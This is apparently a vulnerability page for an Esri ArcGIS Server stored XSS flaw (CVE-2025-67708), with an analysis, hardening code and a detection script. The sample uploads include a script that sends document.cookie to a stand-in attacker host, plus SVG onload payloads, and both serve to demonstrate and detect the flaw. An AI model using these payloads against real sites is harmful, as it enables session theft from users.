CVE-2025-67708

Source: psirt@esri.com

MEDIUM
6.1
Published: December 31, 2025 at 11:15 PM
Modified: January 6, 2026 at 07:04 PM

Vulnerability Description

There is a stored cross-site scripting issue in Esri ArcGIS Server 11.4 and earlier on Windows and Linux that in some configurations allows a remote unauthenticated attacker to store files that contain malicious code that may execute in the context of a victim's browser.

CVSS Metrics

Base Score
6.1
Severity
MEDIUM
Vector String
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Weaknesses (CWE)

Source: psirt@esri.com

AI Security Analysis

01 // Technical Summary

Esri ArcGIS Server 11.4 and earlier on Windows and Linux is affected by a stored cross-site scripting (XSS) vulnerability: in some configurations, a remote attacker with no credentials can store a file on the server whose content executes as script in the browser of a user who later opens it. The CVSS 3.1 vector (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) scores it 6.1 (Medium): no privileges are required and the scope changes from the server to the victim's browser, but a victim must interact, and the rated impact is limited disclosure and modification of data in the victim's session, not a server compromise. The qualifier "in some configurations" matters: the exposure depends on server settings that the advisory summary does not enumerate, so Esri's advisory (the listed source, psirt@esri.com) is the authority on which deployments are reachable.

02 // Vulnerability Mechanism

The advisory summary does not name the storage path, so the following chain is the generic stored-XSS-via-file-storage pattern the description implies, not a confirmed endpoint list.

Step 1: Target selection. The attacker identifies an ArcGIS Server endpoint that, in the affected configurations, accepts and stores files from a client that has not authenticated.

Step 2: Payload creation. The attacker prepares a file whose content a browser will treat as an active document, for example an HTML page or an SVG image carrying script or an event-handler attribute; the file extension is secondary to how the server later labels and delivers the content.

Step 3: Payload storage. The attacker uploads the file. Because the server stores it without rejecting or neutralising active content, the payload now persists on the application's origin.

Step 4: Victim interaction. A legitimate user opens a resource that serves or references the stored file, whether through a map, a service item, or a direct link (UI:R in the vector).

Step 5: Execution. The server returns the file inline with a content type the browser renders as a document, and the embedded script runs in the user's session with the application's origin.

Step 6: Impact. The script can read what the page can read and do what the user can do: exfiltrate session material and data exposed in the page, issue requests as the user, or rewrite the displayed content. The C:L/I:L rating reflects that this is bounded by the victim's own access.

03 // Deep Technical Analysis

The root cause is a failure to treat stored, user-supplied file content as untrusted at the point where it is delivered back to a browser. A file store that accepts uploads from unauthenticated clients is only safe if what it later serves cannot be interpreted as an active document on the application's origin; here, in some configurations, uploaded content is stored as supplied and returned in a way the browser renders, so script inside an HTML or SVG payload executes with the application's origin rather than being downloaded or shown as inert data. Two properties combine to make this a stored, rather than reflected, issue: the payload persists on the server, and every later viewer of the resource is a potential victim, with no need for the attacker to lure each one through a crafted link. Because the attacker needs no account (PR:N), the exposure is bounded only by network reachability of the storage path and by whether the configuration enables it.
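To make the delivery-side root cause concrete, the following is an added example written for this page; it is not ArcGIS Server code and the names in it are placeholders. It models an in-memory upload store with two ways of returning a stored file: a vulnerable handler that serves the bytes inline with the uploader's declared content type, and a hardened handler that forces a download, refuses MIME sniffing, and sandboxes anything that does render. The `scripts_could_run` helper is an approximation of the browser's decision, used only to compare the two handlers on constructed HTML, SVG and PNG uploads.

```python
import re

# In-memory stand-in for a server-side upload store (constructed for this
# example; not ArcGIS Server code, all names are placeholders).
class FileStore:
    def __init__(self):
        self._files = {}

    def put(self, name, declared_type, data):
        """Store a file exactly as the client supplied it, as an
        unauthenticated upload endpoint would in the affected configurations."""
        self._files[name] = (declared_type, data)
        return name

    def get(self, name):
        return self._files[name]


def serve_vulnerable(store, name):
    """The bug class: the stored file is returned inline, on the application's
    origin, with the content type the uploader declared. An uploaded HTML or
    SVG file therefore renders as a document and its script runs as the victim."""
    declared_type, data = store.get(name)
    return {"Content-Type": declared_type}, data


# Types this service legitimately hands back for display; everything else is
# forced to a download (a deployment-specific choice, assumed here).
DISPLAYABLE_TYPES = {"image/png", "image/jpeg", "application/pdf"}

def serve_hardened(store, name):
    """Same store, safe delivery: never trust the declared type for active
    content, disable sniffing, force a download, and sandbox whatever renders."""
    declared_type, data = store.get(name)
    base_type = declared_type.split(";")[0].strip().lower()
    content_type = base_type if base_type in DISPLAYABLE_TYPES else "application/octet-stream"
    safe_name = re.sub(r"[^A-Za-z0-9._-]", "_", name)  # no quotes or CRLF in the header
    headers = {
        "Content-Type": content_type,
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "Content-Security-Policy": "sandbox; default-src 'none'",
    }
    return headers, data


ACTIVE_DOC_TYPES = {"text/html", "application/xhtml+xml", "image/svg+xml"}

def scripts_could_run(headers):
    """Approximation of the browser's decision, used to compare the handlers:
    script can run only if the response is shown inline as an HTML/XHTML/SVG
    document (or the type is missing and sniffing is allowed) and no CSP
    sandbox without allow-scripts applies."""
    ctype = headers.get("Content-Type", "").split(";")[0].strip().lower()
    csp = headers.get("Content-Security-Policy", "").lower()
    if headers.get("Content-Disposition", "").lower().startswith("attachment"):
        return False
    if "sandbox" in csp and "allow-scripts" not in csp:
        return False
    if ctype == "" and headers.get("X-Content-Type-Options", "").lower() != "nosniff":
        return True  # browser may sniff the body and treat it as HTML
    return ctype in ACTIVE_DOC_TYPES


def demo():
    """Constructed uploads: an HTML page, an SVG with an event handler, a PNG.
    Returns {name: (script runs via vulnerable handler, via hardened handler)}."""
    store = FileStore()
    store.put("legend.html", "text/html",
              b"<script>fetch('https://attacker.example/?c='+document.cookie)</script>")
    store.put("north-arrow.svg", "image/svg+xml",
              b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>')
    store.put("tile.png", "image/png", b"\x89PNG\r\n\x1a\n")
    results = {}
    for name in ("legend.html", "north-arrow.svg", "tile.png"):
        results[name] = (scripts_could_run(serve_vulnerable(store, name)[0]),
                         scripts_could_run(serve_hardened(store, name)[0]))
    return results


if __name__ == "__main__":
    for name, (vuln, hard) in demo().items():
        print(f"{name:16} vulnerable handler: {vuln!s:5} hardened handler: {hard}")
```

The point of the comparison is that the hardened handler does not need to detect malicious content at all: by refusing to serve untrusted uploads inline as documents on its own origin, it removes the execution context regardless of what the file contains. Serving uploads from a separate origin achieves the same result and is the usual complement to these headers.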

04 // Exploitation Status

This page cites no public proof-of-concept and no report of in-the-wild exploitation. Stored XSS that is reachable without authentication is generally straightforward to weaponise once the storage path and the enabling configuration are known, so the absence of a public exploit should be treated as temporary rather than as a reason to defer remediation.

05 // Threat Intelligence

The affected population is organisations running ArcGIS Server, which includes government agencies, utilities, and businesses that depend on geospatial services; many of these expose ArcGIS Server to the Internet for public map services, which is the deployment pattern most relevant to an unauthenticated attacker. The technique itself requires no particular sophistication, so the realistic actor set ranges from opportunistic attackers to targeted intrusions that use the foothold for session theft or defacement. No threat actor is linked to this CVE on this page, and no CISA KEV listing is recorded here.

06 // Detection & Hunting

  • Review web-tier access logs for accepted (2xx) POST or PUT requests to any upload or item-storage path that carry no authenticated user and no token, and correlate them with later GET requests for the stored item from other clients. Combined-format logs do not show token headers, so treat hits as leads to confirm against ArcGIS Server's own logs.

  • Inspect the content of files in the server's upload and data directories rather than trusting extensions: an item named as an image or text file that begins with an HTML document, contains a script element or an on*= event attribute, or is an SVG with script is the indicator for this vulnerability class.

  • Check what the server actually returns for stored items: a Content-Type of text/html, application/xhtml+xml or image/svg+xml delivered inline (no Content-Disposition: attachment) for user-supplied files confirms the rendering path exists in your configuration.

  • Alert on new or modified files in data directories that were not written by an authenticated publishing or administrative session.

  • Use a WAF or reverse proxy to log and, where policy allows, block multipart uploads whose body contains script markup; treat this as a detection aid, not as the fix, since encoding variations evade signature matching.

  • Look in client-side telemetry and browser-facing logs (CSP violation reports, unexpected outbound requests from the portal's origin) for signs that stored content has already executed; server-side logs do not record script execution in a victim's browser.
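The first two hunting steps above can be scripted. The following is an added example for this page, not an Esri tool: it parses constructed access-log lines in the Apache/nginx combined format to flag accepted, token-less uploads, and it scans constructed file contents for active markup regardless of extension. The upload path pattern and the sample paths are placeholders to be replaced with the paths of the actual deployment; they are not endpoints taken from the advisory.

```python
import re

# Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Placeholder for the deployment's upload/item-storage paths (assumption).
UPLOAD_PATH_RE = re.compile(r"/uploads?/", re.IGNORECASE)


def parse_line(line):
    """Split one combined-format line into fields; None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    path, _, query = rec["path"].partition("?")
    rec["path"], rec["query"] = path, query
    rec["status"] = int(rec["status"])
    return rec


def is_unauthenticated_upload(rec):
    """Heuristic: an accepted write to an upload path with no authenticated
    user in the log and no token in the query string. Token-in-header logins
    are invisible in combined logs, so hits are leads, not proof."""
    return (rec["method"] in ("POST", "PUT")
            and UPLOAD_PATH_RE.search(rec["path"]) is not None
            and 200 <= rec["status"] < 300
            and rec["user"] == "-"
            and "token=" not in rec["query"].lower())


def find_unauthenticated_uploads(lines):
    """Return (client ip, timestamp, path) for every flagged upload."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and is_unauthenticated_upload(rec):
            hits.append((rec["ip"], rec["ts"], rec["path"]))
    return hits


# Content indicators for stored files. Extension is deliberately ignored: a
# ".txt" or ".jpg" that is really HTML or SVG still renders if served inline.
INDICATORS = {
    "script-tag": re.compile(rb"<\s*script\b", re.IGNORECASE),
    "event-handler": re.compile(rb"\bon[a-z]{3,}\s*=", re.IGNORECASE),
    "javascript-uri": re.compile(rb"javascript\s*:", re.IGNORECASE),
    "svg-root": re.compile(rb"<\s*svg\b", re.IGNORECASE),
    "meta-refresh": re.compile(rb"<\s*meta\b[^>]*http-equiv", re.IGNORECASE),
}


def scan_blob(data):
    """Names of indicators present in the first 64 KiB of a stored file."""
    head = data[:65536]
    return [name for name, rx in INDICATORS.items() if rx.search(head)]


def scan_files(files):
    """{filename: indicators} for every file that has at least one indicator."""
    return {name: hits for name, data in files.items() if (hits := scan_blob(data))}


# Constructed sample data. IPs are documentation ranges; paths are placeholders.
SAMPLE_LOG = """\
203.0.113.5 - - [31/Dec/2025:23:15:02 +0000] "POST /arcgis/rest/services/Sample/FeatureServer/uploads/upload HTTP/1.1" 200 512 "-" "curl/8.4.0"
198.51.100.7 - gisadmin [31/Dec/2025:23:16:10 +0000] "POST /arcgis/rest/services/Sample/FeatureServer/uploads/upload?token=REDACTED HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [31/Dec/2025:23:17:45 +0000] "GET /arcgis/rest/services/Sample/FeatureServer/uploads/i1a2b3 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.9 - - [31/Dec/2025:23:18:01 +0000] "POST /arcgis/rest/services/Sample/FeatureServer/uploads/upload HTTP/1.1" 401 87 "-" "python-requests/2.32"
""".splitlines()

SAMPLE_FILES = {
    "basemap.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,
    "legend.svg": b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)"></svg>',
    "notes.txt": b"<html><body><script>fetch('https://attacker.example/?c='+document.cookie)</script></body></html>",
}

if __name__ == "__main__":
    for ip, ts, path in find_unauthenticated_uploads(SAMPLE_LOG):
        print(f"token-less upload from {ip} at {ts}: {path}")
    for name, hits in scan_files(SAMPLE_FILES).items():
        print(f"active content in {name}: {', '.join(hits)}")
```

Run the log half over the web tier's access logs and the content half over the server's upload directory; a file flagged by the second check that was written at the time of a hit from the first is the event to investigate, together with every later request for that item.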

07 // Remediation & Hardening

  • Follow Esri's advisory for this CVE (source: psirt@esri.com). Only releases 11.4 and earlier are listed as affected, so moving to a later release takes the deployment out of the affected range; for installations that must stay on an affected release, apply the security patch Esri publishes for that release rather than relying on configuration changes alone.

  • Identify the configuration that exposes the storage path in your deployment and disable unauthenticated file storage wherever the business does not require it; the description's "in some configurations" means this is the single most effective interim control.

  • Serve user-supplied files so that they cannot execute on the application's origin: force Content-Disposition: attachment, send X-Content-Type-Options: nosniff, never echo a client-declared text/html or image/svg+xml type, and where possible host uploads on a separate origin.

  • Deploy a Content Security Policy on the ArcGIS Server and portal web applications that disallows inline script and restricts script sources; this limits what a stored payload can do even where it is rendered.

  • Use a WAF or reverse proxy to filter multipart uploads containing script markup as a defence in depth, not as the primary fix.

  • Review which services expose upload or item-storage operations and restrict them to the accounts and networks that need them.

  • Re-scan after patching to confirm the affected version is gone and the delivery headers above are present on stored-item responses.

08 // Affected Products

Esri ArcGIS Server 11.4 and earlier on Windows and Linux